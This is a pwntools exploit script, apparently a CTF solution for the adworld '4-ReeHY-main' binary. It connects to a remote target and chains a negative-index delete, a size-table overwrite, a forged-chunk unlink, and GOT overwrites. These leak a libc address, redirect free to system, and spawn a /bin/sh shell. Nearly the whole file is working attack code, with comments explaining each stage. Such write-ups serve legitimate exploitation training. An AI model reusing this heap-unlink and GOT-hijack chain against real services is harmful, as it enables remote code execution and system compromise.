
adworld-4-ReeHY-main-100

堆溢出+unlink

#coding:utf-8
# CTF exploit script (adworld, 4-ReeHY-main): heap overflow -> unlink, then two
# GOT overwrites: free -> puts (leaks a libc address), free -> system.
# Every address below is hard-coded for this binary and for the libc build
# named in the ELF() call further down; presumably the target is non-PIE,
# with a writable GOT — this script does not check either.
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
context.terminal = ['tmux','splitw','-h']
sh = remote("10.10.31.156","10001")
#sh = process(["/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/ld-2.23.so","./4-ReeHY-main"],env={"LD_PRELOAD":"/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/libc.so.6"})

sh.sendafter('$','sy\n')
sh.sendafter('$','1\n') # create chunk 0
sh.sendafter('Input size\n','256\n')
sh.sendafter('Input cun\n','0\n')
sh.sendafter('Input content','0000\n')
sh.sendafter('$','1\n') # create chunk 1
sh.sendafter('Input size\n','256\n')
sh.sendafter('Input cun\n','1\n')
sh.sendafter('Input content','1111\n')
sh.sendafter('$','2\n')
sh.sendafter('Chose one to dele\n','-2\n') # negative index: the delete menu is not bounds-checked here

# After this allocation, writing to slot 3 writes into the chunk that stores
# the per-slot content sizes, so the recorded size can be tampered with freely
# and later edits overflow the heap.
sh.sendafter('$','1\n')
sh.sendafter('Input size\n','20\n')
sh.sendafter('Input cun\n','3\n')
sh.sendafter('Input content','3333\n')

sh.sendafter('$','3\n') # set chunk 0's writable size to the maximum, 4096
sh.sendafter('Chose one to edit\n','3\n')
sh.sendafter('Input the content\n',p32(0x1000))

# Fake chunk inside chunk 0 (fd/bk point at the slot table at 0x6020c8/0x6020d0),
# followed by an overwritten prev_size/size for chunk 1.
# If chunk 1's size were left alone it would stay 0x111, i.e. "previous chunk in use",
# and the unlink would not trigger.
payload = p64(0x0) + p64(0x100+1)+p64(0x6020c8) + p64(0x6020d0)+b'A'*(0x100-32)+p64(0x100) +p64(0x110)
sh.sendafter('$','3\n')
sh.sendafter('Chose one to edit\n','0\n')
print('**************************************************************send payload fake_chunk1_size and chunk_fake_fd+chunk_fake_bk*********************************************************************************************')
sh.sendafter('Input the content\n',payload)

sh.sendafter('$','2\n') # free chunk 1 -> unlink consolidates with the fake chunk
sh.sendafter('Chose one to dele\n','1\n')

puts_got = 0x602020
puts_plt = 0x4006d0
# Rewrite the slot table: slot 0 -> puts_got, slot 1 -> free_got, and slot 2's
# pointer back to 0x6020e0 so the table can be overwritten once more later.
free_got = 0x602018
payload = p64(0x0) * 3 + p64(puts_got) + p64(0x1) + p64(free_got) + p64(0x1)+p64(0x6020e0) + p64(0x1)
sh.sendafter('$','3\n')
sh.sendafter('Chose one to edit\n','0\n')
sh.sendafter('Input the content\n',payload)
sh.sendafter('$','3\n')
sh.sendafter('Chose one to edit\n','1\n') # overwrite free's GOT entry with puts_plt
print('**************************************************************send payload2*********************************************************************************************')
sh.sendafter('Input the content\n',p64(puts_plt))

sh.sendafter('$','2\n') # free is now puts; this delete effectively runs puts(*(puts_got))
sh.sendafter('Chose one to dele\n','0\n')
# Leaked address arrives as raw bytes; strip the newline and pad to 8 bytes.
puts_addr = u64(sh.recvline()[:-1].ljust(8,b'\x00'))
print(hex(puts_addr))
# Offsets are only valid for this exact libc build; a different build on the target breaks the leak math.
libc = ELF('libc6_2.23-0ubuntu11.2_amd64.so')
base_addr = puts_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh = base_addr + next(libc.search(b'/bin/sh'))
sh.sendafter('$','3\n') # now change free's GOT entry to system
sh.sendafter('Chose one to edit\n','1\n')
sh.sendafter('Input the content\n',p64(system_addr))
# Overwrite the table once more: the first two entries are left as they are,
# slot 2's content becomes the pointer to "/bin/sh".
# NOTE(review): the live payload below fills the first four words with 0x1
# rather than the GOT pointers used in the commented-out variant — confirm
# that the earlier entries are really no longer needed at this point.
#gdb.attach(sh,gdbscript='''b *0x400c29''')#edit
#payload =p64(puts_got) + p64(0x1) + p64(free_got) + p64(0x1)+p64(bin_sh) + p64(0x1)
payload =p64(0x1) + p64(0x1) + p64(0x1) + p64(0x1)+p64(bin_sh) + p64(0x1)
sh.sendafter('$','3\n')
sh.sendafter('Chose one to edit\n','2\n')
sh.sendafter('Input the content\n',payload)
sh.sendafter('$','2\n')
sh.sendafter('Chose one to dele\n','2\n')# system('/bin/sh')
sh.interactive()